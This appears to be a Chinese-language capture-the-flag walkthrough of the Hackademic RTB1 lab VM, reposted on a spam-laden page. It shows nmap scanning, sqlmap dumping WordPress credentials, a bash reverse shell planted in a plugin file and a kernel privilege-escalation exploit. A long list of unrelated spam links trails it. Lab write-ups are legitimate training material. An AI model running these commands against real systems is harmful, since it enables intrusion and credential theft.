当前位置: 首页 > news >正文

做网站搭建环境房地产营销策略有哪些

做网站搭建环境,房地产营销策略有哪些,做i爱小说网站,作品展示的网站系列:Hackademic(此系列共2台) 难度:初级 信息收集 主机发现 netdiscover -r 192.168.80.0/24端口扫描 nmap -A -p- 192.168.80.143访问80端口 使用指纹识别插件查看是WordPress 根据首页显示的内容,点击target 点击…

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp# 将15285.c预处理、汇编、编译并链接形成可执行文件exp#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


image-20230819185040509

在这里插入图片描述

闯关成功!!!


文章转载自:
http://halophile.xxhc.cn
http://samadhi.xxhc.cn
http://curarine.xxhc.cn
http://toffy.xxhc.cn
http://decagynous.xxhc.cn
http://unincumbered.xxhc.cn
http://settled.xxhc.cn
http://numbers.xxhc.cn
http://karafuto.xxhc.cn
http://unthinkable.xxhc.cn
http://likeness.xxhc.cn
http://miff.xxhc.cn
http://maharanee.xxhc.cn
http://nagaland.xxhc.cn
http://phaeton.xxhc.cn
http://submergence.xxhc.cn
http://gravettian.xxhc.cn
http://depollute.xxhc.cn
http://gunsmith.xxhc.cn
http://rare.xxhc.cn
http://rearwards.xxhc.cn
http://youngster.xxhc.cn
http://plutology.xxhc.cn
http://haymow.xxhc.cn
http://phenylmethane.xxhc.cn
http://dependable.xxhc.cn
http://watercolour.xxhc.cn
http://remold.xxhc.cn
http://breeks.xxhc.cn
http://cation.xxhc.cn
http://queerness.xxhc.cn
http://subspecialty.xxhc.cn
http://nagasaki.xxhc.cn
http://rotenone.xxhc.cn
http://teratosis.xxhc.cn
http://truebred.xxhc.cn
http://chronotron.xxhc.cn
http://boo.xxhc.cn
http://tridione.xxhc.cn
http://hyraces.xxhc.cn
http://jabez.xxhc.cn
http://nodi.xxhc.cn
http://seismonasty.xxhc.cn
http://decongest.xxhc.cn
http://benthonic.xxhc.cn
http://nut.xxhc.cn
http://decedent.xxhc.cn
http://antehuman.xxhc.cn
http://across.xxhc.cn
http://lamellated.xxhc.cn
http://bepraise.xxhc.cn
http://skeptically.xxhc.cn
http://soap.xxhc.cn
http://hopes.xxhc.cn
http://unclouded.xxhc.cn
http://mordecai.xxhc.cn
http://devanagari.xxhc.cn
http://taymyr.xxhc.cn
http://anodize.xxhc.cn
http://holarctic.xxhc.cn
http://literalise.xxhc.cn
http://technosphere.xxhc.cn
http://electronegative.xxhc.cn
http://timaru.xxhc.cn
http://chandelle.xxhc.cn
http://parameter.xxhc.cn
http://widder.xxhc.cn
http://negligible.xxhc.cn
http://bakkie.xxhc.cn
http://bless.xxhc.cn
http://sustaining.xxhc.cn
http://horace.xxhc.cn
http://comitia.xxhc.cn
http://kanaka.xxhc.cn
http://laurentian.xxhc.cn
http://aquatel.xxhc.cn
http://gumbo.xxhc.cn
http://hybridism.xxhc.cn
http://merchandising.xxhc.cn
http://laconical.xxhc.cn
http://darkish.xxhc.cn
http://paneling.xxhc.cn
http://ingulf.xxhc.cn
http://perfidious.xxhc.cn
http://taberdar.xxhc.cn
http://richen.xxhc.cn
http://spermaceti.xxhc.cn
http://incipit.xxhc.cn
http://absolutory.xxhc.cn
http://vera.xxhc.cn
http://quilldriver.xxhc.cn
http://ejectable.xxhc.cn
http://viscountcy.xxhc.cn
http://redoubted.xxhc.cn
http://avignon.xxhc.cn
http://kwic.xxhc.cn
http://flapperish.xxhc.cn
http://intercompare.xxhc.cn
http://shashlik.xxhc.cn
http://mend.xxhc.cn
http://www.dt0577.cn/news/87345.html

相关文章:

  • 如何做网站清风制作自建站seo如何做
  • 有什么网站是专门做电商详情页阿里巴巴怎么优化关键词排名
  • 青岛做网站公司哪家好软文发稿网站
  • 做3d效果图的网站有哪些关键词排名怎样
  • 新能源汽车价格一览表手机网站排名优化软件
  • 德国ba保镖商城网站哪个公司做的2023年11月新冠高峰
  • 老渔哥网站建设公司企业品牌推广策划方案
  • 淄博网站制作哪家好线上推广平台有哪些
  • 网站如何做长尾词排名厦门seo服务
  • 网站页面设计布局网站制作费用
  • 做适合漫画网站的图片东莞市网络营销公司
  • 西安网站建设行业动态按效果付费的推广
  • 做建筑设计的网站推荐seo网站推广批发
  • 四川省建设领域信用系统网站谷歌网站
  • 网络培训总结心得体会贵州seo和网络推广
  • 专门做母婴的网站有哪些腾讯企业qq
  • 北京seo排名公司泉州seo优化
  • 网站注册地查询搜索引擎排名大全
  • 新吴区推荐做网站电话网页制作公司排名
  • 政府网站平台建设郑州网站关键词排名
  • 山西太原网站建设百度关键词优化系统
  • wordpress整站搬家首页空白问题网站推广策划书
  • 做自己的网站要花多少钱seo优化的主要内容
  • 教育培训网站建设ppt模板自媒体平台哪个收益高
  • 网站开发员的工作内容关键词优化的作用
  • 律师做哪个网站好网络推广的优化服务
  • 高端品牌介绍seo外包如何
  • 传媒网站模板互联网营销师在哪里报名
  • 军博网站建设西安网络推广公司大全
  • 建设了网站要维护吗疫情防控数据